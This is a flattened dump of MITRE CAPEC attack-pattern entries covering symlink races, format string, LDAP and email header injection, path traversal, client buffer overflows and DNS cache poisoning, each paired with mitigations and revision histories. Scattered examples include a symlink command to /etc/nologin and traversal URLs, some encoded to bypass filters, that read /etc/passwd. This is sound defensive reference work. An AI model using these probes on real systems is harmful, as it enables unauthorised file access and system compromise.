cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have. Identify Target Attacker identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories. The attacker writes to files in different directories to check whether the application has sufficient checking before file operations. env-Local The attacker creates symlinks to files in different directories. env-Local The application does not check whether the file is a symlink or not before writing data to it. env-Local The system allows creating symlinks. env-Local Some directories do not allow creating symlink. env-Local The application checks whether the file is a symlink or not before writing data to it. env-Local The application does not check whether the file is a symlink or not before writing data to it and the attacker can create symlinks to the files. Perform checks on files to be handled: a) check for existence of file; b) check for symlinks; c) check for hard links. Try to create symlinks to different files The attacker then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase. The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using "sleep(2)" and "usleep()" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application. env-Local The attacker may need a little guesswork on the filenames on which the target application would operate. env-Local The attacker tries to create symlinks to the various filenames. env-Local The attacker can create symlinks to the files in the target directories. env-Local The attacker creates symlink to the files while the target application is operating on the file. Perform checks on files to be handled for existence, symlinks or hard links. Give the sensitive files restricted permissions. Target application operates on created symlinks to sensitive files The attacker is able to create symlinks to sensitive files while the target application is operating on the file. Create the symlink to the sensitive file such as configuration files, etc. env-Local The attacker creates symlinks to sensitive files and the target application operates on them leading to a breach in the security assumptions of the target application. Perform checks on files to be handled for existence, symlinks or hard links. Give sensitive files restricted permissions. Generate semi-random filenames and add the "O_CREAT|O_EXCL" flags to any "open()" calls made. The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The attacker must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear. High Low Spoofing Analysis Time and State The attacker creates a symlink with the "same" name as the file which the application is intending to write to. The application will write to the file- "causing the data to be written where the symlink is pointing". An attack like this can be demonstrated as follows: root# vulprog myFile {...program does some processing...] attacker# ln –s /etc/nologin myFile [...program writes to 'myFile', which points to /etc/nologin...] In the above example, the root user ran a program with poorly written file handling routines, providing the filename "myFile" to vulnprog for the relevant data to be written to. However, the attacker happened to be looking over the shoulder of "root" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login. Low To create symlinks High To identify the files and create the symlinks during the file operation time window No special resources are required beyond the ability to create the necessary symbolic link. Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them. Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions. Confidentiality "Varies by context" Information Leakage Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read memory Integrity Modify memory Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism Availability DoS: crash / exit / restart DoS: instability 59 Targeted CAPEC-159 Redirect Access to Libraries 1000 Attack Pattern ChildOf 154 1000 Attack Pattern ChildOf 176 1000 Category ChildOf 156 Exploitation Penetration High High High Client-Server All All Shaun Colley Crafting Symlinks for Fun and Profit http://www.infosecwriters.com/texts.php?op=display&id=159 Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content MITRE Content Team MITRE 2013-06-21 Updated Comment and Example-Instance_Description Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content CAPEC Content Team MITRE 2013-12-18 Updated Examples-Instances, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, References An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is blindly attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality. The attacker must be able to control the options or switches sent to the target. Medium No special resources are required beyond the ability to send requests to the target. Design: Minimize switch and option functionality to only that necessary for correct function of the command. Implementation: Remove all debug and testing options from production code. 559 Targeted 656 Secondary 88 Secondary 1000 Category ChildOf 210 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol. Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to "share this site with a friend" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an attacker adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an attacker can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character. The target application must allow users to send email to some recipient, must allow the user to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators. Medium No special resources are required beyond access to the target mail application. 1000 Category ChildOf 152 333 Category HasMember 363 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An attacker can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the attacker can write to the program stack. Survey application The attacker takes an inventory of the entry points of the application. Spider web sites for all available links env-Web List parameters, external variables, configuration files variables, etc. that are possibly used by the application. env-All At least one data input to application identified. No inputs to application identified. Note that just because no inputs are identified does not mean that the application will not accept any. Determine user-controllable input susceptible to format string injection Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the attacker suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters. Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters. env-Web Attacker receives normal response from server. env-Web env-Peer2Peer env-CommProtocol env-ClientServer Attacker receives an abnormal message (let's say with a partial dump of the memory) from the application which indicates that the format string was successfully manipulated. env-Web env-Peer2Peer env-CommProtocol env-ClientServer At least one user-controllable input susceptible to injection found. No user-controllable input susceptible to injection found. Search for and report format string injection indicators such as the use of %s, %n, %d, etc. in submitted user input Refrain from using format strings when not necessary, for example fprintf(str) can be replaced by fputs(str), etc. Try to exploit the Format String Injection vulnerability After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints. Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc. env-Web Probing via format character injection was successful in identifying vulnerable input. env-Web env-Peer2Peer env-CommProtocol env-ClientServer Probing via format character injection failed in identifying vulnerable input. env-Web env-Peer2Peer env-CommProtocol env-ClientServer Attacker achieves goal of reading or writing the memory, manipulating the formatting string Attacker unable to exploit the format string injection vulnerability The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters. High High Injection Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a "../po" directory, which can be leveraged to conduct format string attacks. CVE-2007-2027 High In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the attacker. No special resources are required beyond the ability to provide string input to the target. Limit the usage of formatting string functions. Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters. Integrity Modify memory Confidentiality Read memory Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Gain privileges / assume identity Execute unauthorized code or commands Run Arbitrary Code Bypass protection mechanism User-controllable input used as formatting string. Formatting characters associated with malicious string content intended to reveal information or modify the memory. Application (server, client, etc.) 134 Targeted 20 Targeted 74 Targeted 133 Targeted 1000 Category ChildOf 152 User-controllable input shall not be used directly inside a formatting string function e.g., fprintf(user_controllable). Special formatting characters in user-controllable input must be escaped before use by the application in a formatting string function. Ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, use functions that do not support the %n operator in format strings. Reluctance to Trust Defense in Depth Never Use Input as Part of a Directive to any Internal Component Use Authorization Mechanisms Correctly Penetration Exploitation High High Medium Client-Server n-Tier All All All Hal Burch Brendan Saulsbury FIO30-C. Exclude user input from format strings CERT May 2011 https://www.securecoding.cert.org/confluence/display/seccode/FIO30-C.+Exclude+user+input+from+format+strings Robert Auger WASC Threat Classification 2.0 WASC-06 - Format String The Web Application Security Consortium (WASC) Feb 2009 http://projects.webappsec.org/Format-String Fortify The OWASP Application Security Desk Reference Format String The Open Web Application Security Project (OWASP) 2010 https://www.owasp.org/index.php/Format_String John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Romain Gaucher Cigital, Inc. 2007-10-20 Performed a review of content and added additional content Tom Stracener Contract Security Engineer (MITRE) 2007-10-20 Review and added additional content. Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Romain Gaucher Cigital, Inc. 2007-10-20 Performed a review of content and added additional content Tom Stracener Contract Security Engineer (MITRE) 2007-10-20 Review and added additional content. CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value. Survey application The attacker takes an inventory of the entry points of the application. Spider web sites for all available links env-Web Sniff network communications with application using a utility such as WireShark. env-All At least one data input to application identified. No inputs to application identified. Note that just because no inputs are identified does not mean that the application will not accept any. Determine user-controllable input susceptible to LDAP injection For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax Use web browser to inject input through text fields or through HTTP GET parameters env-Web Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header. env-Web Use modified client (modified by reverse engineering) to inject input. env-Web Attacker receives normal response from server. env-Web env-Peer2Peer env-CommProtocol env-ClientServer Attacker receives an error message from target indicating a problem with the LDAP Query env-Web env-CommProtocol env-ClientServer Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException) env-Web env-CommProtocol env-ClientServer At least user controllable data input to application identified. No inputs susceptible to injection into the application were identified.. Search for and alert on unexpected LDAP constructs in application logs, e.g. (email=*)) etc.). Input validation of user-controlled data before including it in a LDAP query Try to exploit the LDAP injection vulnerability After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP. Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings. env-Web Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header. env-Web Attacker receives normal response from server. env-Web env-Peer2Peer env-CommProtocol env-ClientServer Probing via LDAP syntax injection was successful in identifying vulnerable input. env-Web env-CommProtocol env-ClientServer Probing via LDAP syntax injection failed in identifying vulnerable input. env-Web env-CommProtocol env-ClientServer Attacker achieves goal of unauthorized information access, etc. Attacker unable to exploit LDAP Injection vulnerability. Search for and alert on unexpected LDAP constructs in application logs, e.g. (email=*)) etc.). Input validation of user-controlled data before including it in a LDAP query The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed. High High Injection PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. CVE-2005-2301 Medium Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content. Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application. Availability DoS: crash / exit / restart Availability DoS: instability Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism User-controllable input used as part of LDAP queries: This may include input fields on web forms, data in user-accessible files or even command-line parameters. LDAP statement intended to reveal information or run malicious code Back-end LDAP directory tree When malicious LDAP content is executed by the LDAP engine, it can lead to arbitrary queries being executed, causing disclosure of information, unauthorized access, privilege escalation and possibly system compromise. 77 Targeted 90 Targeted 20 Targeted 1000 Category ChildOf 152 Special characters in user-controllable input must be escaped before use by the application. Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the LDAP structure. Reluctance to Trust Defense in Depth Failing Securely Handle All Errors Safely Never Use Input as Part of a Directive to any Internal Component Penetration Exploitation High High High Client-Server n-Tier All All All WASC Threat Classification 2.0 WASC-29 - LDAP Injection The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/LDAP-Injection John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Tom Stracener Contract Security Engineer (MITRE) 20011-07-12 Converted to XML and reviewed content Chiradeep B. Chhaya Cigital, Inc 2007-02-23 Fleshed out pattern with extra content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Attack Execution Flow, Attack Prerequisites, Examples and Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Tom Stracener Contract Security Engineer (MITRE) 20011-07-12 Converted to XML and reviewed content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker exploits weaknesses in input validation by manipulating the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value "myInput&new_param=myValue", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example. The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text. The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed. Medium No special resources are required beyond the ability to provide string input to the target. 1000 Category ChildOf 152 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an attacker can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the attacker created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the attacker take control of the targeted application. The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. Very High No special resources are required for most forms of this attack beyond the ability to provide input to the target that is used to populate parameters for reflection methods. If the attacker can host classes where the target can invoke them, more powerful variants of this attack are possible. 1000 Category ChildOf 152 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure. Survey application Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds. He picks out the URL parameters that may related to access to files. Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browser's plug-in are available to facilitate the analysis or automate the URL discovery. env-Web There are links that include parameters in URL. env-Web Using URL rewriting, parameters may be part of the URL path. env-Web env-CommProtocol env-ClientServer No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters is created by the attacker. A list of application user interface entry fields is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Attempt variations on input parameters Possibly using an automated tool, an attacker requests variations on the identified inputs. He sends parameters that include variations of payloads. Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as "../". env-Web Use a proxy tool to record results of manual input of relative path traversal probes in known URLs. env-Web Attackers can access arbitrary files. env-Web The output of pages includes some error messages if file does not exist. env-Web env-CommProtocol env-ClientServer All context-sensitive characters are consistently re-encoded before being sent to the web browser. env-Web env-CommProtocol env-ClientServer The attacker's file path probe string is being reflected verbatim at some point in the web site (if not on the same page). An error message or exception. Note that the system may leak information to the attackers in the error messages, e.g. "File Not Found", "File Access Restricted". Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard relative path traversal probes. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input. Actively monitor the application and either deny or redirect requests from origins that appear to be generating path traversal probes. Access, modify, or execute arbitrary files. An attacker injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An attacker could be able to read directories or files which they are normally not allowed to read. The attacker could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the attacker accesses arbitrary files, he/she could also modify files. In particular situations, the attacker could also execute arbitrary code or system commands. Manipulate file and its path by injecting relative path sequences (e.g. "../"). env-Web Download files, modify files, or try to execute shell commands (with binary files). env-Web The attacker accesses the content of restricted files. Apply appropriate input validation to filter all user-controllable input of path syntax. Monitor server logs for unintended file access, modification and execution. Apply appropriate input validation to filter all user-controllable input of path syntax The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands. High High Injection The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file. http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string. Then an attacker creates special payloads to bypass this filter: http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd When the application gets this input string, it will be the desired vector by the attacker. Low To inject the malicious payload in a web page High To bypass non trivial filters in the application Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement Implementation: Perform input validation for all remote content, including remote and user-generated content. Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- whitelisting approach. Implementation: Prefer working without user input when using file system calls Implementation: Use indirect references rather than actual file names. Implementation: Use possible permissions on file access when developing and deploying web applications. Integrity Modify files or directories Confidentiality Read files or directories Execute unauthorized code or commands Run Arbitrary Code Bypass protection mechanism Availability DoS: crash / exit / restart Availability DoS: instability User-controllable input into web parameters or post variables. variations on "../../" characters and encoded varieties. Web server processing of GET or POST content. • Attackers may create or overwrite critical files. • Execute unauthorized code or commands. • Information Leakage of applications that attackers may read confidential files. • Attackers may delete or corrupt some critical files or data that cause denial of service to legal users. 22 Targeted 20 Targeted CVE-2010-0467 Newsletter module allows reading arbitrary files using "../" sequences. CVE-2009-4581 PHP program allows arbitrary code execution using ".." in filenames that are fed to the include() function. 1000 Category ChildOf 126 1000 Attack Pattern ChildOf 154 Special characters in user-controllable input must be escaped before use by the application. Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application. Penetration Exploitation High High Low Client-Server n-Tier All All All The OWASP Application Security Desk Reference Path Traversal The Open Web Application Security Project (OWASP) 2009 https://www.owasp.org/index.php/Path_Traversal OWASP Testing Guide Testing for Path Traversal (OWASP-AZ-001) v3 The Open Web Application Security Project (OWASP) 2010 https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001) WASC Threat Classification 2.0 WASC-33 - Path Traversal The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/w/page/13246952/Path-Traversal Sean Barnum Cigital 2007-02-10 Initial core pattern content Sean Barnum Cigital 2007-02-10 Initial core pattern content Romain Gaucher Cigital, Inc. 2011-07-12 Performed a review of content and added additional content Tom Stracener Contract Security Engineer (MITRE) 20011-07-19 Review and Revision of Content MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Romain Gaucher Cigital, Inc. 2011-07-12 Performed a review of content and added additional content Tom Stracener Contract Security Engineer (MITRE) 20011-07-19 Review and Revision of Content CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. The attacker creates a custom hostile service The attacker acquires information about the kind of client attaching to her hostile service to determine if it contains an exploitable buffer overflow vulnerability. The attacker intentionally feeds malicious data to the client to exploit the buffer overflow vulnerability that she has uncovered. The attacker leverages the exploit to execute arbitrary code or to cause a denial of service. The targeted client software communicates with an external server. The targeted client software has a buffer overflow vulnerability. High Medium API Abuse Injection Attack Example: Buffer Overflow in Internet Explorer 4.0 Via EMBED Tag Authors often use <EMBED> tags in HTML documents. For example <EMBED TYPE="audio/midi" SRC="/path/file.mid" AUTOSTART="true"> If an attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild. Low To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. High Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level. The server may look like a valid server, but in reality it may be a hostile server aimed at fooling the client software. For instance the server can use honey pots and get the client to download malicious code. Once engaged with the client, the hostile server may attempt to scan the client's host for open ports and potential vulnerabilities in the client software. The hostile server may also attempt to install and run malicious code on the client software. That malicious code can be used to scan the client software for buffer overflow. An example of indicator is when the client software crashes after executing code downloaded from a hostile server. The client software should not install untrusted code from a non-authenticated server. The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers. Perform input validation for length of buffer inputs. Use a language or compiler that performs automatic bounds checking. Use an abstraction library to abstract away risky APIs. Not a complete solution. Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. Ensure all buffer uses are consistently bounds-checked. Use OS-level preventative functionality. Not a complete solution. Confidentiality Read memory Integrity Modify memory Availability DoS: resource consumption (memory) Denial of Service Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Attacker-supplied data potentially containing malicious code. When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to malicious code. The most common are remote code execution or denial of service. 120 Targeted 353 Targeted 118 Targeted 119 Targeted 74 Targeted 20 Targeted 680 Targeted 697 Targeted 713 Targeted 1000 Attack Pattern ChildOf 8 1000 Attack Pattern ChildOf 100 Reluctance to Trust Defense in Depth Penetration High High High Client-Server Other All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-119: Buffer Errors Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/119.html [R.14.1][REF-2] Cigital, Inc 2007-03-01 [R.14.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Solutions_and_Mitigations Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application. The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms. Medium No special resources are required for this attack. 1000 Attack Pattern ChildOf 74 An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value. Identify and explore caches Use tools to sniff traffic and scan a network in order to locate application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries. Run tools that check available entries in the cache. env-All Entries do not exist in the cache. env-All Applications or servers are not updated to new versions. env-All Entries exist in the cache. env-Web A list of server's information. No target entry found in the cache. A list of browser's information. No target entry found in the cache. The results show target entries in the cache. Monitor network scans and examine system logs. The scans may be from unknown local IP or MAC address. Cause specific data to be cached An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries. Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID). env-Web Request that the attacker intercepts includes transaction ID. env-All The attacker successfully sends response before authorized server. env-All Transaction ID has been randomized. env-Web env-CommProtocol env-ClientServer The application or server cache has recorded correct table entry. In this case, the attacker needs to figure out a way to overwrite table entries to succeed env-All The attacker fails to send responses before authorized responses. In this case, the attacker needs to figure out a way to overwrite table entries to succeed env-All Any request of the targeted form results in the seeded response. Any request of the targeted form results in the correct response and not the seeded response. Monitor log file and see a large number of responses sent from the same host. This host may be manipulated by attacker. Redirect users to malicious website As the attacker succeeds in exploiting the vulnerability, he is able to manipulate and interpose malicious response data to targeted victim queries. Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID). env-Web Man-in-the-Middle intercepts secure communication between two parties. env-Web Any request of the targeted form results in the seeded response. Any request of the targeted form results in the correct response and not the seeded response. Be less trusting of the information passed to them by other parties, and ignoring any records passed back which are not directly relevant to the query. The attacker must be able to modify the value stored in a cache to match a desired value. The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations. High High Injection DNS cache poisoning example In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7. Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack. Medium To overwrite/modify targeted cache Configuration: Disable client side caching. Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes. 348 